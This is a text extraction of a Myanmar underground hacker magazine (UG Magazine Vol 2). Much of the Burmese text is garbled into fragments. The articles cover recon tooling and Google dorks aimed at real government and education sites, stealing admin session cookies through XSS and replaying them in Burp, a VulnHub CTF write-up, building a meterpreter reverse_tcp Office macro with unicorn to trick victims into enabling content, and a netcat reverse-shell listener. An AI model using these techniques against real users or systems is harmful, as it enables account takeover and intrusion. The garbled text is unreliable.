B24565

1|Page UG MAGAZINE VOL 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

2|Page UG MAGAZINE VOL 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

3|Page UG MAGAZINE VOL 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

4|Page UG MAGAZINE VOL 2 Produced By MBH Find the Egg with enumeration 6 8 Google Hacking Data Base 17 20 Installation Wordpress In Kali Linux 24 32 DNS (Domain name System) 40 46 Hijack Cookies with XSS 50 56 LAZYSYSADMIN WRITEUP 60 70 Attacking With Macro 78 81 REVERSE FROM THE SERVER 85 89 COOKIE BASED INJECTION 92 110 WS ၐ Load_File ႔ 111 Http-Parameter-Pollution CTF Experience RED ROOM HISTORY OF HACKING Fire sale Cyber attack SOCIAL ENGINEERING BITCOIN ( BTC ) DOCKER (၁) Power By Union Of Underground Myanmar Hackers

5|Page UG MAGAZINE VOL 2 Produced By MBH Developer vs Pentester In Myanmar 115 119 Cyber Warfare 124 130 facebook account 138 143 Sqli Injection [ routed query] 149 157 CSRF(cross site request forgery) 162 168 How to deface with JS or XSS defacement 174 181 How I hacked Android App 184 187 Cryptography&Encryption For Beginner 190 197 D // D ‘t Attacking Web Service Facebook Security How Search Engine works How to Hide Backdoor In Website Interview with UGMH Web Server Hacking Power By Union Of Underground Myanmar Hackers

6|Page UG MAGAZINE VOL 2 Produced By MBH ႔။ ။ ။ ။ ႔ ။ ႔ Wikipedia ႔ Website ၊ ႔ ၊ ။Google Movie ၍ ၊ search engine ႔ ။႔ ႔ ၏ ၍ ။ ။ ၍ ၏ ။ ႔ၐ Power By Union Of Underground Myanmar Hackers

7|Page UG MAGAZINE VOL 2 Produced By MBH ။ ႔ ။ ၊ ၐ Cloud storage ၐ႔ ၊Online shopping ။ ။ website ၊ ။႔ ႔ Security ။ Security Security ၍ ။ Facebook ။ social website ။ Facebook ၊၊ ၊ ၊ ၐ၊ ။ Facebook ။ ႔ ။ Online ႔ ။ ႔ ။ network Internet ၐ social ၐ ။ Facebook account ၍ ။ ။ ၍ D ၊ ၐ ။ ။ ၍။ ၐ။ ၍ ၍ ႔ ။ ၏ Min Thu (UG Magazine Editor) Myanmar Black Hacking Power By Union Of Underground Myanmar Hackers

8|Page UG MAGAZINE VOL 2 Produced By MBH Find the Egg with enumeration Min KoKo Security ။Target () ႔ ။ ။System Information Pentesting ။ ႔။ lock ႔ ႔ ။ ။႔ lock ႔ ၊ St ။ System T tS t S ။ Attacker ( H System ။P Target System information ။ information gathering ႔ ။ footprinting or enumeration ႔ ။ Power By Union Of Underground Myanmar Hackers

9|Page UG MAGAZINE VOL 2 Produced By MBH 1. IP and DNS enumeration Kali linux default ။Domain Information C Ot ။ DNS Name Server Contact email address ။ ။ Whois Command www Target – google.com Whois record domain name Owner IP Address, Contact address, Domain t ။Website expire date name server ။ whois.domaintoosl.com Target – twitter.com Power By Union Of Underground Myanmar Hackers

10 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Dnsenum dns information ။ Target – amazon.com Target DNS ႔ DNSSpy ႔ ။ DNSSpy target Ut ။ email ႔ ။ DNSSpy Website https://dnsspy.io/ 7 free ႔ ။ Power By Union Of Underground Myanmar Hackers

11 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH DNS reverse tool viewdns website ။ DNS ႔ IP ႔။ 2.Enumerating Subdomain Power By Union Of Underground Myanmar Hackers

12 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Target websit ႔ Target system ႔ ႔ ။ At subdomain ႔ ။ subdomain ။ Subdomain enumeration ။ T Sublist3r, enumall Aquatone ႔ ။ T T ။ ။ ။႔ ။ Dig command subdomain takeover ။ 1. Sublist3r Download - https://github.com/aboul3la/Sublist3r ./sublist3r.py -d google.com -t 3 2.enumall Download - https://github.com/jhaddix/domain ./enumall.py yahoo.com Power By Union Of Underground Myanmar Hackers

13 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 3. Aquatone Download - https://github.com/michenriksen/aquatone Aquatone-discover -d corp.yahoo.com 3.Build Technology ။ Target exploit ႔ ။ target system view page Browser extension ႔ ။ C souce ။ Power By Union Of Underground Myanmar Hackers

14 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Command line tool ႔ whatweb target t CMS CMSMap Tool ။ ႔။ ႔ ႔။ CMS Wordpress results ၐ ။ ႔ wpscan Whatweb CMSMap Power By Union Of Underground Myanmar Hackers

15 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 4. Finding hidden resources Crawling ။ t t ။ Scann Crawling Rt scan ။ scan ။ scan crawling process ။ crawling ၐ hidden file backup ။ process ။ Window t Burp, Acunetix ႔ dirbuster T ။ Acunetix Support ႔ ၊ dirb linux and windwo ။ admin panel ႔ ။ ။ Burp suite ။ Window Linux ။ Mac ႔ ။ Burp spider function crawling ။ Tool Cangibrina ။t t ။t ႔ 5. Port Scanning Target basic information ႔ ႔ ။ nmap target system S ႔ nmap nmap ။ exploit ။ ႔ Dracnmap ႔။ ႔ ။Hacker ။ 6. SSL Checks Power By Union Of Underground Myanmar Hackers

16 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Target system https ssl ႔ ။ ssllabs GUI t ။႔ t။ ။Certificate SSLCLI command line tool ။ t ။ SSL Heart - bleed, Drown, Poodle, Freak 7. Github Repositories Github ။ public ။ gitrob t ။ results ။ t႔ tool ႔ config file, updae password, 8. Mapping Data t ။ ႔ system Mindjet, XMind ႔ ။ Freemind, Mindmup, Mindnode, ။ t။ ႔ clients report t ။ Ref - http://blog.gaurangbhatnagar.com/2017/07/10/Art-of-Enumeration.html Blog ။ Thanks for reading... Min KoKo Power By Union Of Underground Myanmar Hackers

17 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Google Hacking Data Base Zen Zue 127.0.0.1 Google ။ ။ ။ Tt weak ။ 1997 September 15 F Dt ။ GHDB Hacking ။ ႔G D Register ။C Dt ႔ ။ Google Company 1998 ႔ Hacker ။ https://www.exploit-db.com/google-hacking-database/ S ။ ၊ ႔ ။Key ။ ”‖ ႔ ။Search box ။ ။ Key ၊ ‖‖ ႔႔ ။ ။ Dork ။ Inurl website URL tV ။ - inurl:index.php?id= inurl url ။index.php id t= value ။ id=1 or id=2 ။ Sql injection ။ File including inurl:index.php?file=*.php ။ inurl ။ OK Site: ။ .com .com.mm filter ။ inurl:index.php?id= site:.gov.mm gov.mm ။။ Power By Union Of Underground Myanmar Hackers

18 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Myanmar customs http://www.myanmartradeportal.gov.mm/index.php?r=site/display&id=770 ။ ext: t t ။ Ext:sql site:go.id http://pauddikmasjateng.kemdikbud.go.id/ecourse/ekursus_1_nop_2016.sql & intitle ။S zip bak title ။ Intext ။ Exploit-db ။ Text dork dork ။ inurl:\"/address/speeddial.html?start\" and intext:\"Please configure the password\" and intitle:\"Brother\" url /address/speeddial text pls config d pwd title brother ။B t t password configure ။Title title browser title bar ၐ ။ Result ၐ။ ။Back ။ ႔ down Udmey t t ။ ။ Tut title :download ။ tutname ext:rar ။ ။ Power By Union Of Underground Myanmar Hackers

19 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။t ။ goldchannel gold channel ၐ ။Crack intext ။ goldechannel :myanmar ။ t tt ။ Inurl ၐ ႔။ ႔႔ ။Dork simple ၐ exploit-db ………………။ Zen Zue Power By Union Of Underground Myanmar Hackers

20 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Installation Wordpress In Kali Linux mr.Gh0st N@0b ( Myanmar Noob Hackers Team) Kali Linux ။ XAMPP ႔ Localhost ။ XAMPP Mysql Config ။Installation ႔ ႔ Download ။ Requirement: - Apache2 server (Kali Linux OS ) - PHP 5.2.4 or greater - MySQL 5.0 or greater - Sublime Test (Text Editor) - Wordpress Files (https://wordpress.org/download/) - PhPmyadmin (http://www.phpmyadmin.net/) Step – 1 PHP 5.2.4 or greater ႔ MySQL 5.0 or greater ။Terminal root@mnh:~# php -v PHP 5.4.36-0+deb7u1 (cli) (built: Dec 31 2014 08:33:05) Copyright (c) 1997-2014 The PHP Group Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies root@mnh:~# mysql -V mysql Ver 14.14 Distrib 5.5.40, for debian-linux-gnu (i686) using readline 6.2 Step – 2 Wordpress ႔ P P Power By Union Of Underground Myanmar Hackers

21 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH F St > > ႔ wordpress.zip ။ F t> > phpmyadmin.zip ။ Step – 3 Terminal root@mnh:~# chmod 777 /var/www/ root@mnh:~# chmod 777 /var/www/* Chmood 777 R Wt P ။ phpmyadmin config ။ root@mnh:~# cd /var/www/phpMyAdmin-4.3.6-all-languages/ root@mnh:~# /var/www/phpMyAdmin-4.3.6-all-languages root@mnh:~#mkdir config #config directory create ။ root@mnh:~# chmod o+rw config #t ။ root@mnh:~# cp config.inc.php config/ #config.inc.php copy editing ႔။ root@mnh:~# chmod o+w config/config.inc.php #chmod o+w t ။{ # } ။ Step – 4 http://localhost/phpMyAdmin-4.3.6-all-languages/ Mysql root ႔ login ။ ။ Terminal login ။ password reset root@mnh:~# service mysql stop root@mnh:~# mysqld_safe --skip-grant-tables Power By Union Of Underground Myanmar Hackers

22 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH [Output:[1] 5988 Starting mysqld daemon with databases from /var/lib/mysql mysqld_safe[6025]: started ( Terminal root@mnh:~# mysql -u root mysql > use mysql mysql > update user set password=PASSWORD(\"NEW-ROOT-PASSWORD\") where User='root'; ―NEW-ROOT-PASSWORD‖ ႔ Password ) mysql > flush privileges; root@mnh:~# service mysql restart root@mnh:~# mysql -u root –p P ―NEW-ROOT-PASSWORD‖ ႔ ႔ Password ။ ( Terminal Copy NEW-ROOT- PASSWORD ႔ login Skill :v ) Step – 5 Wordpress database user ။Login ႔ Databases Tab Database ။Database_Name wp_mybaby ႔ FA ႔ :P) Collection t 8 Create Button ။User ႔ User Tab Add user ။User name: Use text field ။Host Local localhost ႔ ၐ ။ password ။Global privileges Check all Go ။ User Tab wordpress user Edit Privileges t ။ GT Database Tab ။A t : wp_mybaby or wp_yourname Go ။ Check all Go ။ wordpress Database ႔ User Table Phpmyadmin ႔ ႔ Power By Union Of Underground Myanmar Hackers

23 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Step – 6 http://localhost/wordpress/wp-admin/setup-config.php wordpress /var/www/ wp-config-sample.php text editor ႔ define('DB_NAME', 'wp_mybaby'); define('DB_USER', 'root'); define('DB_PASSWORD', 'iloveu'); ႔ ၃ save as ႔ wp-config.php ။ ) Wordpress register ။ Thanks for your patient, mr.Gh0st N@0b ( Myanmar Noob Hackers Team) Power By Union Of Underground Myanmar Hackers

24 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH DNS (Domain name System) Surf GHT DNS IP Name ႔ ႔။ IP ႔ N change ။႔ ႔။ ( ႔။ ) ။ ႔ Change ။ ၐ Change ႔ ။( ) ႔N ။႔ ၁ ၂ ( ) ။႔ ။ ‖120005‖ Number ႔ ႔ ― (၁ ၂ ၅/ ႔ ႔ ။” ၐ ( ႔ၐ ၐ ။ N t ၐ IP domain name ႔ ၐ IP ႔ ၐ ႔ ႔ IP ။႔ (www.facebook.com) ႔ ၐ Number 31.13.78.35 facebook.com ( ) ႔ IP D System DNS Server (Domain Name System Server) ။ O SUSE L 42 1 64 ၐ DNS Serv I t t C t terminal ။DNS Server ( BIND) package file ။ #zypper install bind* ႔ ။ Power By Union Of Underground Myanmar Hackers

25 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH named.conf file t vi editor ၊ commend … #vi /etc/named.conf named.conf ။line no. 54 forwarders DNS ။ ။ YTP DNS 10.10.10.10 forwarders {10.10.10.10; }; # # Line 67 t ။t ႔။ Listen-on port 53 {127.0.0.1; 192.168.1.54; }; Power By Union Of Underground Myanmar Hackers

26 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Under line Linux server IP ။ ၁ DNS Local Network … DHCP IP IP Address tt IP ႔ ။ t IP ဏ ဏ Allow-query ။ allow-query {127.0.0.1;192.168.1.0/24; }; ။ ႔။ named.conf file ။ ။ ႔ ။( ၁ zone file named.conf zone file ၁၁ ႔ ) Power By Union Of Underground Myanmar Hackers

27 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ― ‖{ type master; ― t/ ‖; }; ―54 1 168 192 - ‖{ type master; ― t /192 168 1 54 ‖; }; Esc :wq ႔ save ။Named.conf file ႔။ #vi /etc/resolv.conf__ Power By Union Of Underground Myanmar Hackers

28 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH #touch /var/lib/named/master/192.168.1.54.zone #vi /var/lib/named/master/192.168.1.54.zone #touch /var/lib/named/master/mrsurf.zone #vi /var/lib/named/master/mrsurf.zone Power By Union Of Underground Myanmar Hackers

29 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH #service named start t ။ #service named status A t DNS S Power By Union Of Underground Myanmar Hackers

30 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH T … ႔ configuration ။ ။။ slave zone Surf Power By Union Of Underground Myanmar Hackers

31 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Hijack Cookies with XSS Author: Pyae Nyein Chan Cookie ႔ ႔ information ။ C w t browser ႔ hard disk ။ ႔။ website [more :http://www.boomhack.net/2013/12/810] ႔ User website Login ။ Login user session information maintain ။ R႔ emember Password ႔ data ႔ ။Browser ။ Web User Browser cookie ႔ hard disk stored Cookie ႔ ႔ ။ cookies ။ plane txt ႔ browser User ။ Browser R t Web ႔ Web ။ So How to Hijack Admin's Cookies? M t XSS A ႔ hijack ။ Download ။ https://github.com/DisK0nn3cT/CookieCatcher Free Hosting ႔။ Power By Union Of Underground Myanmar Hackers

32 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH XSS Payload 2 ႔ #1 ။ XSS Q t ။ Save ႔။ ႔ Website User ႔Login ။ Admin XP ။ Power By Union Of Underground Myanmar Hackers

33 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔႔ Xss Payload web \"Hey there\" ၐ ။ link ။ ?႔ ႔P S Power By Union Of Underground Myanmar Hackers

34 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔ Xss Payload .. C C t ။ .. .. ႔ User ႔ Login web ႔ IP ၐ .. ႔ ႔C Admin ႔ ။ ! :D ႔ Admin ႔ ။ Admin C ။ Ct ။Admin Web ႔ IP 08iq0nf......! Ok :) C Power By Union Of Underground Myanmar Hackers

35 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ HC ။ ႔C ! PHPSESSID=08iq0nf...... ။ . Admin Cookies .. Cookies Login ? >>>>>>>> [How to Login with Cookies?] <<<<<<<<<<< Burp Suite ။ Repeater C Copy past ။ Go Response ။ Right C Show response in browser Link C ။ :) Power By Union Of Underground Myanmar Hackers

36 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH User ႔ Login Page ။ Burp Suite L past ။ Admin Cookies Admin Page :D Power By Union Of Underground Myanmar Hackers

37 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ =) Thz for Reading ! Ref : Danny Chrastil & team0x5bd.net , bbb Pyae Nyein Chan Power By Union Of Underground Myanmar Hackers

38 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Power By Union Of Underground Myanmar Hackers

39 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH LAZYSYSADMIN WRITEUP Download Vm Link – https://www.vulnhub.com/entry/lazysysadmin-1,205/ vm download vmware vbox run ။vm os ။ nmap ႔lab ႔ ။ scanning ႔ scan command ႔။ nmap -sV 192.168.43.67 ip network ။ namp -sV 192.168.43.0/24 network ။ scan result ။ ssh,http,mysql,samba t႔ ။Port 80 nikto tool ႔ ။ nikto -h 192.168.43.67 Power By Union Of Underground Myanmar Hackers

40 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Site wordpress site phpmyadmin browser ip ၐ ။ http://192.168.43.67/wordpress and http://192.168.43.67/phpmyadmin wordpress wpscan ႔ website scan ။ wpscan -url http://192.168.43.67/wordpress –enumerate users Power By Union Of Underground Myanmar Hackers

41 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH wpscan vuln ႔ username admin ။ ။႔ samba port nse script ႔ share ႔ scan t ။ scanning ။ ႔ share$ folder anonymous access ။ smb client ႔ ၐ ။ smb:\\\\192.168.43.67။ ။ share$ folder ႔ share$ folder anonmyous connect ။ folder ။ Power By Union Of Underground Myanmar Hackers

42 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ႔႔ - ႔။ DB_USER – Admin DB_PASSWORD – TogieMYSQL12345^^ ႔ phpmyadmin login ႔။ Phpmyadmin wp admin password change permission ။ ။႔ Admin ႔ db_user and password wordpress login ၐ wpscan scan username ။ Power By Union Of Underground Myanmar Hackers

43 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH wordpress site metasploit ။ meterpreter session root access ႔ ။ /etc/passwd file ႔။ togie user local root exploit share$ folder deets.txt file password ႔ ssh login password ႔ ႔ togie user ။ Power By Union Of Underground Myanmar Hackers

44 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH ။ ႔ ။ sudo password ။ root access ။ၐ proof.txt ႔ cat ႔ flag file ။ Wai Yan Htet Facebook - https://www.facebook.com/waiyanhtet007 Power By Union Of Underground Myanmar Hackers

45 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH Attacking With Macro A macro is a feature that allows users to create automated processes inside of a document used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user experience, increase productivity, or automate otherwise manual tasks. But, in other words, it executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter session! P.S – P t I ‘t D ‘t tt t ; Just basic level. Techniques: Unicorn & Social Engineering Macro attacks are nothing new or unusual.A typical attack usually involves embedding malicious macro code in an Office document, sending it to the victim, and asking him or her t t t T t t ‘t t tt , basically begging the victim to run your malware. It's that people have been falling for this t ! L t‘ t t 1. First download unicorn from https://github.com/trustedsec/unicorn Power By Union Of Underground Myanmar Hackers

46 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 2. You can find usages by simply run unicorn.py. Type following command to create macro. Python unicorn.py windows/meterpreter/reverse_tcp <ip> <port> macro Do you see Unicorn??? 3. Your code is saved to powershell_attack.txt 4. Open excel, then click on Macros in VIEW tab. 5. Create your ugly program. ;) Power By Union Of Underground Myanmar Hackers

47 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 6. Copy macro code from powershell_attack.txt that was generated from unicorn. Then paste it. 7M t ―E M -E W ‖ type. 8. Use your social engineering technique to enable content as previous t ‘t I victim click enable content, u won the lottery. Power By Union Of Underground Myanmar Hackers

48 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH 9. Success. For further walking, Ref: https://blog.rapid7.com/2017/03/08/attacking-microsoft-office- openoffice-with- metasploit-macro-exploits/ https://www.youtube.com/watch?v=OzekG1I-do0 https://thehackernews.com/2017/10/ms-office-dde-malware.html I t t t , I‘ Truly, Optimus Prime Power By Union Of Underground Myanmar Hackers

49 | P a g e U G M A G A Z I N E V O L 2 Produced By MBH REVERSE FROM THE SERVER Thura Moe Myint Server shell access tt root ။ ။ command run ။R t RUN ႔ reverse ႔ What is reverse shell? A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server. reverse shell Server reverse connect ။ reverse connect ။Local host port 443 list target port connect ။ nc -lnvp 443 Bash ႔ reverse ။ target ႔ port reverse shell bash ။ In target console, Et reverse ။ tt ။ Power By Union Of Underground Myanmar Hackers